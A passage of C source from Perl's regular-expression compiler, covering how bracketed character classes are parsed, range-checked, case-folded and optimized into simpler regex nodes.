* generally knowable under locale until actual match time. A
* special node is used for these which has extra space for a
* bitmap, with a bit reserved for each named class that is to
* be matched against. (This isn't needed for \p{} and
* pseudo-classes, as they are not affected by locale, and
* hence are dealt with separately.) However, if a named class
* and its complement are both present, then it matches
* everything, and there is no runtime dependency. Odd numbers
* are the complements of the next lower number, so xor works.
* (Note that something like [\w\D] should match everything,
* because \d should be a proper subset of \w. But rather than
* trust that the locale is well behaved, we leave this to
* runtime to sort out) */
if (POSIXL_TEST(posixl, namedclass ^ 1)) {
cp_list = _add_range_to_invlist(cp_list, 0, UV_MAX);
POSIXL_ZERO(posixl);
has_runtime_dependency &= ~HAS_L_RUNTIME_DEPENDENCY;
anyof_flags &= ~ANYOF_MATCHES_POSIXL;
continue; /* We could ignore the rest of the class, but
best to parse it for any errors */
}
else { /* Here, isn't the complement of any already parsed
class */
POSIXL_SET(posixl, namedclass);
has_runtime_dependency |= HAS_L_RUNTIME_DEPENDENCY;
anyof_flags |= ANYOF_MATCHES_POSIXL;
/* The above-Latin1 characters are not subject to locale
* rules. Just add them to the unconditionally-matched
* list */
/* Get the list of the above-Latin1 code points this
* matches */
_invlist_intersection_maybe_complement_2nd(PL_AboveLatin1,
PL_XPosix_ptrs[classnum],
/* Odd numbers are complements,
* like NDIGIT, NASCII, ... */
namedclass % 2 != 0,
&scratch_list);
/* Checking if 'cp_list' is NULL first saves an extra
* clone. Its reference count will be decremented at the
* next union, etc, or if this is the only instance, at the
* end of the routine */
if (! cp_list) {
cp_list = scratch_list;
}
else {
_invlist_union(cp_list, scratch_list, &cp_list);
SvREFCNT_dec_NN(scratch_list);
}
continue; /* Go get next character */
}
}
else {
/* Here, is not /l, or is a POSIX class for which /l doesn't
* matter (or is a Unicode property, which is skipped here). */
if (namedclass >= ANYOF_POSIXL_MAX) { /* If a special class */
if (namedclass != ANYOF_UNIPROP) { /* UNIPROP = \p and \P */
/* Here, should be \h, \H, \v, or \V. None of /d, /i
* nor /l make a difference in what these match,
* therefore we just add what they match to cp_list. */
if (classnum != _CC_VERTSPACE) {
assert( namedclass == ANYOF_HORIZWS
|| namedclass == ANYOF_NHORIZWS);
/* It turns out that \h is just a synonym for
* XPosixBlank */
classnum = _CC_BLANK;
}
_invlist_union_maybe_complement_2nd(
cp_list,
PL_XPosix_ptrs[classnum],
namedclass % 2 != 0, /* Complement if odd
(NHORIZWS, NVERTWS)
*/
&cp_list);
}
}
else if ( AT_LEAST_UNI_SEMANTICS
|| classnum == _CC_ASCII
|| (DEPENDS_SEMANTICS && ( classnum == _CC_DIGIT
|| classnum == _CC_XDIGIT)))
{
/* We usually have to worry about /d affecting what POSIX
* classes match, with special code needed because we won't
* know until runtime what all matches. But there is no
* extra work needed under /u and /a; and [:ascii:] is
* unaffected by /d; and :digit: and :xdigit: don't have
* runtime differences under /d. So we can special case
* these, and avoid some extra work below, and at runtime.
* */
_invlist_union_maybe_complement_2nd(
simple_posixes,
((AT_LEAST_ASCII_RESTRICTED)
? PL_Posix_ptrs[classnum]
: PL_XPosix_ptrs[classnum]),
namedclass % 2 != 0,
&simple_posixes);
}
else { /* Garden variety class. If is NUPPER, NALPHA, ...
complement and use nposixes */
SV** posixes_ptr = namedclass % 2 == 0
? &posixes
: &nposixes;
_invlist_union_maybe_complement_2nd(
*posixes_ptr,
PL_XPosix_ptrs[classnum],
namedclass % 2 != 0,
posixes_ptr);
}
}
} /* end of namedclass \blah */
SKIP_BRACKETED_WHITE_SPACE(skip_white, RExC_parse);
/* If 'range' is set, 'value' is the ending of a range--check its
* validity. (If value isn't a single code point in the case of a
* range, we should have figured that out above in the code that
* catches false ranges). Later, we will handle each individual code
* point in the range. If 'range' isn't set, this could be the
* beginning of a range, so check for that by looking ahead to see if
* the next real character to be processed is the range indicator--the
* minus sign */
if (range) {
#ifdef EBCDIC
/* For unicode ranges, we have to test that the Unicode as opposed
* to the native values are not decreasing. (Above 255, there is
* no difference between native and Unicode) */
if (unicode_range && prevvalue < 255 && value < 255) {
if (NATIVE_TO_LATIN1(prevvalue) > NATIVE_TO_LATIN1(value)) {
goto backwards_range;
}
}
else
#endif
if (prevvalue > value) /* b-a */ {
int w;
#ifdef EBCDIC
backwards_range:
#endif
w = RExC_parse - rangebegin;
vFAIL2utf8f(
"Invalid [] range \"%" UTF8f "\"",
UTF8fARG(UTF, w, rangebegin));
NOT_REACHED; /* NOTREACHED */
}
}
else {
prevvalue = value; /* save the beginning of the potential range */
if (! stop_at_1 /* Can't be a range if parsing just one thing */
&& *RExC_parse == '-')
{
char* next_char_ptr = RExC_parse + 1;
/* Get the next real char after the '-' */
SKIP_BRACKETED_WHITE_SPACE(skip_white, next_char_ptr);
/* If the '-' is at the end of the class (just before the ']',
* it is a literal minus; otherwise it is a range */
if (next_char_ptr < RExC_end && *next_char_ptr != ']') {
RExC_parse = next_char_ptr;
/* a bad range like \w-, [:word:]- ? */
if (namedclass > OOB_NAMEDCLASS) {
if (strict || ckWARN(WARN_REGEXP)) {
const int w = RExC_parse >= rangebegin
? RExC_parse - rangebegin
: 0;
if (strict) {
vFAIL4("False [] range \"%*.*s\"",
w, w, rangebegin);
}
else {
vWARN4(RExC_parse,
"False [] range \"%*.*s\"",
w, w, rangebegin);
}
}
cp_list = add_cp_to_invlist(cp_list, '-');
element_count++;
} else
range = 1; /* yeah, it's a range! */
continue; /* but do it the next time */
}
}
}
if (namedclass > OOB_NAMEDCLASS) {
continue;
}
/* Here, we have a single value this time through the loop, and
* <prevvalue> is the beginning of the range, if any; or <value> if
* not. */
/* non-Latin1 code point implies unicode semantics. */
if (value > 255) {
REQUIRE_UNI_RULES(flagp, 0);
}
/* Ready to process either the single value, or the completed range.
* For single-valued non-inverted ranges, we consider the possibility
* of multi-char folds. (We made a conscious decision to not do this
* for the other cases because it can often lead to non-intuitive
* results. For example, you have the peculiar case that:
* "s s" =~ /^[^\xDF]+$/i => Y
* "ss" =~ /^[^\xDF]+$/i => N
*
* See [perl #89750] */
if (FOLD && allow_mutiple_chars && value == prevvalue) {
if ( value == LATIN_SMALL_LETTER_SHARP_S
|| (value > 255 && _invlist_contains_cp(PL_HasMultiCharFold,
value)))
{
/* Here <value> is indeed a multi-char fold. Get what it is */
U8 foldbuf[UTF8_MAXBYTES_CASE+1];
STRLEN foldlen;
UV folded = _to_uni_fold_flags(
value,
foldbuf,
&foldlen,
FOLD_FLAGS_FULL | (ASCII_FOLD_RESTRICTED
? FOLD_FLAGS_NOMIX_ASCII
: 0)
);
/* Here, <folded> should be the first character of the
* multi-char fold of <value>, with <foldbuf> containing the
* whole thing. But, if this fold is not allowed (because of
* the flags), <fold> will be the same as <value>, and should
* be processed like any other character, so skip the special
* handling */
if (folded != value) {
/* Skip if we are recursed, currently parsing the class
* again. Otherwise add this character to the list of
* multi-char folds. */
if (! RExC_in_multi_char_class) {
STRLEN cp_count = utf8_length(foldbuf,
foldbuf + foldlen);
SV* multi_fold = sv_2mortal(newSVpvs(""));
Perl_sv_catpvf(aTHX_ multi_fold, "\\x{%" UVXf "}", value);
multi_char_matches
= add_multi_match(multi_char_matches,
multi_fold,
cp_count);
}
/* This element should not be processed further in this
* class */
element_count--;
value = save_value;
prevvalue = save_prevvalue;
continue;
}
}
}
if (strict && ckWARN(WARN_REGEXP)) {
if (range) {
/* If the range starts above 255, everything is portable and
* likely to be so for any forseeable character set, so don't
* warn. */
if (unicode_range && non_portable_endpoint && prevvalue < 256) {
vWARN(RExC_parse, "Both or neither range ends should be Unicode");
}
else if (prevvalue != value) {
/* Under strict, ranges that stop and/or end in an ASCII
* printable should have each end point be a portable value
* for it (preferably like 'A', but we don't warn if it is
* a (portable) Unicode name or code point), and the range
* must be be all digits or all letters of the same case.
* Otherwise, the range is non-portable and unclear as to
* what it contains */
if ( (isPRINT_A(prevvalue) || isPRINT_A(value))
&& ( non_portable_endpoint
|| ! ( (isDIGIT_A(prevvalue) && isDIGIT_A(value))
|| (isLOWER_A(prevvalue) && isLOWER_A(value))
|| (isUPPER_A(prevvalue) && isUPPER_A(value))
))) {
vWARN(RExC_parse, "Ranges of ASCII printables should"
" be some subset of \"0-9\","
" \"A-Z\", or \"a-z\"");
}
else if (prevvalue >= FIRST_NON_ASCII_DECIMAL_DIGIT) {
SSize_t index_start;
SSize_t index_final;
/* But the nature of Unicode and languages mean we
* can't do the same checks for above-ASCII ranges,
* except in the case of digit ones. These should
* contain only digits from the same group of 10. The
* ASCII case is handled just above. Hence here, the
* range could be a range of digits. First some
* unlikely special cases. Grandfather in that a range
* ending in 19DA (NEW TAI LUE THAM DIGIT ONE) is bad
* if its starting value is one of the 10 digits prior
* to it. This is because it is an alternate way of
* writing 19D1, and some people may expect it to be in
* that group. But it is bad, because it won't give
* the expected results. In Unicode 5.2 it was
* considered to be in that group (of 11, hence), but
* this was fixed in the next version */
if (UNLIKELY(value == 0x19DA && prevvalue >= 0x19D0)) {
goto warn_bad_digit_range;
}
else if (UNLIKELY( prevvalue >= 0x1D7CE
&& value <= 0x1D7FF))
{
/* This is the only other case currently in Unicode
* where the algorithm below fails. The code
* points just above are the end points of a single
* range containing only decimal digits. It is 5
* different series of 0-9. All other ranges of
* digits currently in Unicode are just a single
* series. (And mktables will notify us if a later
* Unicode version breaks this.)
*
* If the range being checked is at most 9 long,
* and the digit values represented are in
* numerical order, they are from the same series.
* */
if ( value - prevvalue > 9
|| ((( value - 0x1D7CE) % 10)
<= (prevvalue - 0x1D7CE) % 10))
{
goto warn_bad_digit_range;
}
}
else {
/* For all other ranges of digits in Unicode, the
* algorithm is just to check if both end points
* are in the same series, which is the same range.
* */
index_start = _invlist_search(
PL_XPosix_ptrs[_CC_DIGIT],
prevvalue);
/* Warn if the range starts and ends with a digit,
* and they are not in the same group of 10. */
if ( index_start >= 0
&& ELEMENT_RANGE_MATCHES_INVLIST(index_start)
&& (index_final =
_invlist_search(PL_XPosix_ptrs[_CC_DIGIT],
value)) != index_start
&& index_final >= 0
&& ELEMENT_RANGE_MATCHES_INVLIST(index_final))
{
warn_bad_digit_range:
vWARN(RExC_parse, "Ranges of digits should be"
" from the same group of"
" 10");
}
}
}
}
}
if ((! range || prevvalue == value) && non_portable_endpoint) {
if (isPRINT_A(value)) {
char literal[3];
unsigned d = 0;
if (isBACKSLASHED_PUNCT(value)) {
literal[d++] = '\\';
}
literal[d++] = (char) value;
literal[d++] = '\0';
vWARN4(RExC_parse,
"\"%.*s\" is more clearly written simply as \"%s\"",
(int) (RExC_parse - rangebegin),
rangebegin,
literal
);
}
else if isMNEMONIC_CNTRL(value) {
vWARN4(RExC_parse,
"\"%.*s\" is more clearly written simply as \"%s\"",
(int) (RExC_parse - rangebegin),
rangebegin,
cntrl_to_mnemonic((U8) value)
);
}
}
}
/* Deal with this element of the class */
#ifndef EBCDIC
cp_foldable_list = _add_range_to_invlist(cp_foldable_list,
prevvalue, value);
#else
/* On non-ASCII platforms, for ranges that span all of 0..255, and ones
* that don't require special handling, we can just add the range like
* we do for ASCII platforms */
if ((UNLIKELY(prevvalue == 0) && value >= 255)
|| ! (prevvalue < 256
&& (unicode_range
|| (! non_portable_endpoint
&& ((isLOWER_A(prevvalue) && isLOWER_A(value))
|| (isUPPER_A(prevvalue)
&& isUPPER_A(value)))))))
{
cp_foldable_list = _add_range_to_invlist(cp_foldable_list,
prevvalue, value);
}
else {
/* Here, requires special handling. This can be because it is a
* range whose code points are considered to be Unicode, and so
* must be individually translated into native, or because its a
* subrange of 'A-Z' or 'a-z' which each aren't contiguous in
* EBCDIC, but we have defined them to include only the "expected"
* upper or lower case ASCII alphabetics. Subranges above 255 are
* the same in native and Unicode, so can be added as a range */
U8 start = NATIVE_TO_LATIN1(prevvalue);
unsigned j;
U8 end = (value < 256) ? NATIVE_TO_LATIN1(value) : 255;
for (j = start; j <= end; j++) {
cp_foldable_list = add_cp_to_invlist(cp_foldable_list, LATIN1_TO_NATIVE(j));
}
if (value > 255) {
cp_foldable_list = _add_range_to_invlist(cp_foldable_list,
256, value);
}
}
#endif
range = 0; /* this range (if it was one) is done now */
} /* End of loop through all the text within the brackets */
if ( posix_warnings && av_tindex_skip_len_mg(posix_warnings) >= 0) {
output_posix_warnings(pRExC_state, posix_warnings);
}
/* If anything in the class expands to more than one character, we have to
* deal with them by building up a substitute parse string, and recursively
* calling reg() on it, instead of proceeding */
if (multi_char_matches) {
SV * substitute_parse = newSVpvn_flags("?:", 2, SVs_TEMP);
I32 cp_count;
STRLEN len;
char *save_end = RExC_end;
char *save_parse = RExC_parse;
char *save_start = RExC_start;
Size_t constructed_prefix_len = 0; /* This gives the length of the
constructed portion of the
substitute parse. */
bool first_time = TRUE; /* First multi-char occurrence doesn't get
a "|" */
I32 reg_flags;
assert(! invert);
/* Only one level of recursion allowed */
assert(RExC_copy_start_in_constructed == RExC_precomp);
#if 0 /* Have decided not to deal with multi-char folds in inverted classes,
because too confusing */
if (invert) {
sv_catpvs(substitute_parse, "(?:");
}
#endif
/* Look at the longest folds first */
for (cp_count = av_tindex_skip_len_mg(multi_char_matches);
cp_count > 0;
cp_count--)
{
if (av_exists(multi_char_matches, cp_count)) {
AV** this_array_ptr;
SV* this_sequence;
this_array_ptr = (AV**) av_fetch(multi_char_matches,
cp_count, FALSE);
while ((this_sequence = av_pop(*this_array_ptr)) !=
&PL_sv_undef)
{
if (! first_time) {
sv_catpvs(substitute_parse, "|");
}
first_time = FALSE;
sv_catpv(substitute_parse, SvPVX(this_sequence));
}
}
}
/* If the character class contains anything else besides these
* multi-character folds, have to include it in recursive parsing */
if (element_count) {
sv_catpvs(substitute_parse, "|[");
constructed_prefix_len = SvCUR(substitute_parse);
sv_catpvn(substitute_parse, orig_parse, RExC_parse - orig_parse);
/* Put in a closing ']' only if not going off the end, as otherwise
* we are adding something that really isn't there */
if (RExC_parse < RExC_end) {
sv_catpvs(substitute_parse, "]");
}
}
sv_catpvs(substitute_parse, ")");
#if 0
if (invert) {
/* This is a way to get the parse to skip forward a whole named
* sequence instead of matching the 2nd character when it fails the
* first */
sv_catpvs(substitute_parse, "(*THEN)(*SKIP)(*FAIL)|.)");
}
#endif
/* Set up the data structure so that any errors will be properly
* reported. See the comments at the definition of
* REPORT_LOCATION_ARGS for details */
RExC_copy_start_in_input = (char *) orig_parse;
RExC_start = RExC_parse = SvPV(substitute_parse, len);
RExC_copy_start_in_constructed = RExC_start + constructed_prefix_len;
RExC_end = RExC_parse + len;
RExC_in_multi_char_class = 1;
ret = reg(pRExC_state, 1, ®_flags, depth+1);
*flagp |= reg_flags & (HASWIDTH|SIMPLE|SPSTART|POSTPONED|RESTART_PARSE|NEED_UTF8);
/* And restore so can parse the rest of the pattern */
RExC_parse = save_parse;
RExC_start = RExC_copy_start_in_constructed = RExC_copy_start_in_input = save_start;
RExC_end = save_end;
RExC_in_multi_char_class = 0;
SvREFCNT_dec_NN(multi_char_matches);
return ret;
}
/* If folding, we calculate all characters that could fold to or from the
* ones already on the list */
if (cp_foldable_list) {
if (FOLD) {
UV start, end; /* End points of code point ranges */
SV* fold_intersection = NULL;
SV** use_list;
/* Our calculated list will be for Unicode rules. For locale
* matching, we have to keep a separate list that is consulted at
* runtime only when the locale indicates Unicode rules (and we
* don't include potential matches in the ASCII/Latin1 range, as
* any code point could fold to any other, based on the run-time
* locale). For non-locale, we just use the general list */
if (LOC) {
use_list = &only_utf8_locale_list;
}
else {
use_list = &cp_list;
}
/* Only the characters in this class that participate in folds need
* be checked. Get the intersection of this class and all the
* possible characters that are foldable. This can quickly narrow
* down a large class */
_invlist_intersection(PL_in_some_fold, cp_foldable_list,
&fold_intersection);
/* Now look at the foldable characters in this class individually */
invlist_iterinit(fold_intersection);
while (invlist_iternext(fold_intersection, &start, &end)) {
UV j;
UV folded;
/* Look at every character in the range */
for (j = start; j <= end; j++) {
U8 foldbuf[UTF8_MAXBYTES_CASE+1];
STRLEN foldlen;
unsigned int k;
Size_t folds_count;
unsigned int first_fold;
const unsigned int * remaining_folds;
if (j < 256) {
/* Under /l, we don't know what code points below 256
* fold to, except we do know the MICRO SIGN folds to
* an above-255 character if the locale is UTF-8, so we
* add it to the special list (in *use_list) Otherwise
* we know now what things can match, though some folds
* are valid under /d only if the target is UTF-8.
* Those go in a separate list */
if ( IS_IN_SOME_FOLD_L1(j)
&& ! (LOC && j != MICRO_SIGN))
{
/* ASCII is always matched; non-ASCII is matched
* only under Unicode rules (which could happen
* under /l if the locale is a UTF-8 one */
if (isASCII(j) || ! DEPENDS_SEMANTICS) {
*use_list = add_cp_to_invlist(*use_list,
PL_fold_latin1[j]);
}
else if (j != PL_fold_latin1[j]) {
upper_latin1_only_utf8_matches
= add_cp_to_invlist(
upper_latin1_only_utf8_matches,
PL_fold_latin1[j]);
}
}
if (HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(j)
&& (! isASCII(j) || ! ASCII_FOLD_RESTRICTED))
{
add_above_Latin1_folds(pRExC_state,
(U8) j,
use_list);
}
continue;
}
/* Here is an above Latin1 character. We don't have the
* rules hard-coded for it. First, get its fold. This is
* the simple fold, as the multi-character folds have been
* handled earlier and separated out */
folded = _to_uni_fold_flags(j, foldbuf, &foldlen,
(ASCII_FOLD_RESTRICTED)
? FOLD_FLAGS_NOMIX_ASCII
: 0);
/* Single character fold of above Latin1. Add everything
* in its fold closure to the list that this node should
* match. */
folds_count = _inverse_folds(folded, &first_fold,
&remaining_folds);
for (k = 0; k <= folds_count; k++) {
UV c = (k == 0) /* First time through use itself */
? folded
: (k == 1) /* 2nd time use, the first fold */
? first_fold
/* Then the remaining ones */
: remaining_folds[k-2];
/* /aa doesn't allow folds between ASCII and non- */
if (( ASCII_FOLD_RESTRICTED
&& (isASCII(c) != isASCII(j))))
{
continue;
}
/* Folds under /l which cross the 255/256 boundary are
* added to a separate list. (These are valid only
* when the locale is UTF-8.) */
if (c < 256 && LOC) {
*use_list = add_cp_to_invlist(*use_list, c);
continue;
}
if (isASCII(c) || c > 255 || AT_LEAST_UNI_SEMANTICS)
{
cp_list = add_cp_to_invlist(cp_list, c);
}
else {
/* Similarly folds involving non-ascii Latin1
* characters under /d are added to their list */
upper_latin1_only_utf8_matches
= add_cp_to_invlist(
upper_latin1_only_utf8_matches,
c);
}
}
}
}
SvREFCNT_dec_NN(fold_intersection);
}
/* Now that we have finished adding all the folds, there is no reason
* to keep the foldable list separate */
_invlist_union(cp_list, cp_foldable_list, &cp_list);
SvREFCNT_dec_NN(cp_foldable_list);
}
/* And combine the result (if any) with any inversion lists from posix
* classes. The lists are kept separate up to now because we don't want to
* fold the classes */
if (simple_posixes) { /* These are the classes known to be unaffected by
/a, /aa, and /d */
if (cp_list) {
_invlist_union(cp_list, simple_posixes, &cp_list);
SvREFCNT_dec_NN(simple_posixes);
}
else {
cp_list = simple_posixes;
}
}
if (posixes || nposixes) {
if (! DEPENDS_SEMANTICS) {
/* For everything but /d, we can just add the current 'posixes' and
* 'nposixes' to the main list */
if (posixes) {
if (cp_list) {
_invlist_union(cp_list, posixes, &cp_list);
SvREFCNT_dec_NN(posixes);
}
else {
cp_list = posixes;
}
}
if (nposixes) {
if (cp_list) {
_invlist_union(cp_list, nposixes, &cp_list);
SvREFCNT_dec_NN(nposixes);
}
else {
cp_list = nposixes;
}
}
}
else {
/* Under /d, things like \w match upper Latin1 characters only if
* the target string is in UTF-8. But things like \W match all the
* upper Latin1 characters if the target string is not in UTF-8.
*
* Handle the case with something like \W separately */
if (nposixes) {
SV* only_non_utf8_list = invlist_clone(PL_UpperLatin1, NULL);
/* A complemented posix class matches all upper Latin1
* characters if not in UTF-8. And it matches just certain
* ones when in UTF-8. That means those certain ones are
* matched regardless, so can just be added to the
* unconditional list */
if (cp_list) {
_invlist_union(cp_list, nposixes, &cp_list);
SvREFCNT_dec_NN(nposixes);
nposixes = NULL;
}
else {
cp_list = nposixes;
}
/* Likewise for 'posixes' */
_invlist_union(posixes, cp_list, &cp_list);
SvREFCNT_dec(posixes);
/* Likewise for anything else in the range that matched only
* under UTF-8 */
if (upper_latin1_only_utf8_matches) {
_invlist_union(cp_list,
upper_latin1_only_utf8_matches,
&cp_list);
SvREFCNT_dec_NN(upper_latin1_only_utf8_matches);
upper_latin1_only_utf8_matches = NULL;
}
/* If we don't match all the upper Latin1 characters regardless
* of UTF-8ness, we have to set a flag to match the rest when
* not in UTF-8 */
_invlist_subtract(only_non_utf8_list, cp_list,
&only_non_utf8_list);
if (_invlist_len(only_non_utf8_list) != 0) {
anyof_flags |= ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER;
}
SvREFCNT_dec_NN(only_non_utf8_list);
}
else {
/* Here there were no complemented posix classes. That means
* the upper Latin1 characters in 'posixes' match only when the
* target string is in UTF-8. So we have to add them to the
* list of those types of code points, while adding the
* remainder to the unconditional list.
*
* First calculate what they are */
SV* nonascii_but_latin1_properties = NULL;
_invlist_intersection(posixes, PL_UpperLatin1,
&nonascii_but_latin1_properties);
/* And add them to the final list of such characters. */
_invlist_union(upper_latin1_only_utf8_matches,
nonascii_but_latin1_properties,
&upper_latin1_only_utf8_matches);
/* Remove them from what now becomes the unconditional list */
_invlist_subtract(posixes, nonascii_but_latin1_properties,
&posixes);
/* And add those unconditional ones to the final list */
if (cp_list) {
_invlist_union(cp_list, posixes, &cp_list);
SvREFCNT_dec_NN(posixes);
posixes = NULL;
}
else {
cp_list = posixes;
}
SvREFCNT_dec(nonascii_but_latin1_properties);
/* Get rid of any characters from the conditional list that we
* now know are matched unconditionally, which may make that
* list empty */
_invlist_subtract(upper_latin1_only_utf8_matches,
cp_list,
&upper_latin1_only_utf8_matches);
if (_invlist_len(upper_latin1_only_utf8_matches) == 0) {
SvREFCNT_dec_NN(upper_latin1_only_utf8_matches);
upper_latin1_only_utf8_matches = NULL;
}
}
}
}
/* And combine the result (if any) with any inversion list from properties.
* The lists are kept separate up to now so that we can distinguish the two
* in regards to matching above-Unicode. A run-time warning is generated
* if a Unicode property is matched against a non-Unicode code point. But,
* we allow user-defined properties to match anything, without any warning,
* and we also suppress the warning if there is a portion of the character
* class that isn't a Unicode property, and which matches above Unicode, \W
* or [\x{110000}] for example.
* (Note that in this case, unlike the Posix one above, there is no
* <upper_latin1_only_utf8_matches>, because having a Unicode property
* forces Unicode semantics */
if (properties) {
if (cp_list) {
/* If it matters to the final outcome, see if a non-property
* component of the class matches above Unicode. If so, the
* warning gets suppressed. This is true even if just a single
* such code point is specified, as, though not strictly correct if
* another such code point is matched against, the fact that they
* are using above-Unicode code points indicates they should know
* the issues involved */
if (warn_super) {
warn_super = ! (invert
^ (invlist_highest(cp_list) > PERL_UNICODE_MAX));
}
_invlist_union(properties, cp_list, &cp_list);
SvREFCNT_dec_NN(properties);
}
else {
cp_list = properties;
}
if (warn_super) {
anyof_flags
|= ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER;
/* Because an ANYOF node is the only one that warns, this node
* can't be optimized into something else */
optimizable = FALSE;
}
}
/* Here, we have calculated what code points should be in the character
* class.
*
* Now we can see about various optimizations. Fold calculation (which we
* did above) needs to take place before inversion. Otherwise /[^k]/i
* would invert to include K, which under /i would match k, which it
* shouldn't. Therefore we can't invert folded locale now, as it won't be
* folded until runtime */
/* If we didn't do folding, it's because some information isn't available
* until runtime; set the run-time fold flag for these We know to set the
* flag if we have a non-NULL list for UTF-8 locales, or the class matches
* at least one 0-255 range code point */
if (LOC && FOLD) {
/* Some things on the list might be unconditionally included because of
* other components. Remove them, and clean up the list if it goes to
* 0 elements */
if (only_utf8_locale_list && cp_list) {
_invlist_subtract(only_utf8_locale_list, cp_list,
&only_utf8_locale_list);
if (_invlist_len(only_utf8_locale_list) == 0) {
SvREFCNT_dec_NN(only_utf8_locale_list);
only_utf8_locale_list = NULL;
}
}
if ( only_utf8_locale_list
|| (cp_list && ( _invlist_contains_cp(cp_list, LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE)
|| _invlist_contains_cp(cp_list, LATIN_SMALL_LETTER_DOTLESS_I))))
{
has_runtime_dependency |= HAS_L_RUNTIME_DEPENDENCY;
anyof_flags
|= ANYOFL_FOLD
| ANYOFL_SHARED_UTF8_LOCALE_fold_HAS_MATCHES_nonfold_REQD;
}
else if (cp_list) { /* Look to see if a 0-255 code point is in list */
UV start, end;
invlist_iterinit(cp_list);
if (invlist_iternext(cp_list, &start, &end) && start < 256) {
anyof_flags |= ANYOFL_FOLD;
has_runtime_dependency |= HAS_L_RUNTIME_DEPENDENCY;
}
invlist_iterfinish(cp_list);
}
}
else if ( DEPENDS_SEMANTICS
&& ( upper_latin1_only_utf8_matches
|| (anyof_flags & ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER)))
{
RExC_seen_d_op = TRUE;
has_runtime_dependency |= HAS_D_RUNTIME_DEPENDENCY;
}
/* Optimize inverted patterns (e.g. [^a-z]) when everything is known at
* compile time. */
if ( cp_list
&& invert
&& ! has_runtime_dependency)
{
_invlist_invert(cp_list);
/* Clear the invert flag since have just done it here */
invert = FALSE;
}
if (ret_invlist) {
*ret_invlist = cp_list;
return RExC_emit;
}
/* All possible optimizations below still have these characteristics.
* (Multi-char folds aren't SIMPLE, but they don't get this far in this
* routine) */
*flagp |= HASWIDTH|SIMPLE;
if (anyof_flags & ANYOF_LOCALE_FLAGS) {
RExC_contains_locale = 1;
}
/* Some character classes are equivalent to other nodes. Such nodes take
* up less room, and some nodes require fewer operations to execute, than
* ANYOF nodes. EXACTish nodes may be joinable with adjacent nodes to
* improve efficiency. */
if (optimizable) {
PERL_UINT_FAST8_T i;
Size_t partial_cp_count = 0;
UV start[MAX_FOLD_FROMS+1] = { 0 }; /* +1 for the folded-to char */
UV end[MAX_FOLD_FROMS+1] = { 0 };
if (cp_list) { /* Count the code points in enough ranges that we would
see all the ones possible in any fold in this version
of Unicode */
invlist_iterinit(cp_list);
for (i = 0; i <= MAX_FOLD_FROMS; i++) {
if (! invlist_iternext(cp_list, &start[i], &end[i])) {
break;
}
partial_cp_count += end[i] - start[i] + 1;
}
invlist_iterfinish(cp_list);
}
/* If we know at compile time that this matches every possible code
* point, any run-time dependencies don't matter */
if (start[0] == 0 && end[0] == UV_MAX) {
if (invert) {
ret = reganode(pRExC_state, OPFAIL, 0);
}
else {
ret = reg_node(pRExC_state, SANY);
MARK_NAUGHTY(1);
}
goto not_anyof;
}
/* Similarly, for /l posix classes, if both a class and its
* complement match, any run-time dependencies don't matter */
if (posixl) {
for (namedclass = 0; namedclass < ANYOF_POSIXL_MAX;
namedclass += 2)
{
if ( POSIXL_TEST(posixl, namedclass) /* class */
&& POSIXL_TEST(posixl, namedclass + 1)) /* its complement */
{
if (invert) {
ret = reganode(pRExC_state, OPFAIL, 0);
}
else {
ret = reg_node(pRExC_state, SANY);
MARK_NAUGHTY(1);
}
goto not_anyof;
}
}
/* For well-behaved locales, some classes are subsets of others,
* so complementing the subset and including the non-complemented
* superset should match everything, like [\D[:alnum:]], and
* [[:^alpha:][:alnum:]], but some implementations of locales are
* buggy, and khw thinks its a bad idea to have optimization change
* behavior, even if it avoids an OS bug in a given case */
#define isSINGLE_BIT_SET(n) isPOWER_OF_2(n)
/* If is a single posix /l class, can optimize to just that op.
* Such a node will not match anything in the Latin1 range, as that
* is not determinable until runtime, but will match whatever the
* class does outside that range. (Note that some classes won't
* match anything outside the range, like [:ascii:]) */
if ( isSINGLE_BIT_SET(posixl)
&& (partial_cp_count == 0 || start[0] > 255))
{
U8 classnum;
SV * class_above_latin1 = NULL;
bool already_inverted;
bool are_equivalent;
/* Compute which bit is set, which is the same thing as, e.g.,
* ANYOF_CNTRL. From
* https://graphics.stanford.edu/~seander/bithacks.html#IntegerLogDeBruijn
* */
static const int MultiplyDeBruijnBitPosition2[32] =
{
0, 1, 28, 2, 29, 14, 24, 3, 30, 22, 20, 15, 25, 17, 4, 8,
31, 27, 13, 23, 21, 19, 16, 7, 26, 12, 18, 6, 11, 5, 10, 9
};
namedclass = MultiplyDeBruijnBitPosition2[(posixl
* 0x077CB531U) >> 27];
classnum = namedclass_to_classnum(namedclass);
/* The named classes are such that the inverted number is one
* larger than the non-inverted one */
already_inverted = namedclass
- classnum_to_namedclass(classnum);
/* Create an inversion list of the official property, inverted
* if the constructed node list is inverted, and restricted to
* only the above latin1 code points, which are the only ones
* known at compile time */
_invlist_intersection_maybe_complement_2nd(
PL_AboveLatin1,
PL_XPosix_ptrs[classnum],
already_inverted,
&class_above_latin1);
are_equivalent = _invlistEQ(class_above_latin1, cp_list,
FALSE);
SvREFCNT_dec_NN(class_above_latin1);
if (are_equivalent) {
/* Resolve the run-time inversion flag with this possibly
* inverted class */
invert = invert ^ already_inverted;
ret = reg_node(pRExC_state,
POSIXL + invert * (NPOSIXL - POSIXL));
FLAGS(REGNODE_p(ret)) = classnum;
goto not_anyof;
}
}
}
/* khw can't think of any other possible transformation involving
* these. */
if (has_runtime_dependency & HAS_USER_DEFINED_PROPERTY) {
goto is_anyof;
}
if (! has_runtime_dependency) {
/* If the list is empty, nothing matches. This happens, for
* example, when a Unicode property that doesn't match anything is
* the only element in the character class (perluniprops.pod notes
* such properties). */
if (partial_cp_count == 0) {
if (invert) {
ret = reg_node(pRExC_state, SANY);
}
else {
ret = reganode(pRExC_state, OPFAIL, 0);
}
goto not_anyof;
}
/* If matches everything but \n */
if ( start[0] == 0 && end[0] == '\n' - 1
&& start[1] == '\n' + 1 && end[1] == UV_MAX)
{
assert (! invert);
ret = reg_node(pRExC_state, REG_ANY);
MARK_NAUGHTY(1);
goto not_anyof;
}
}
/* Next see if can optimize classes that contain just a few code points
* into an EXACTish node. The reason to do this is to let the
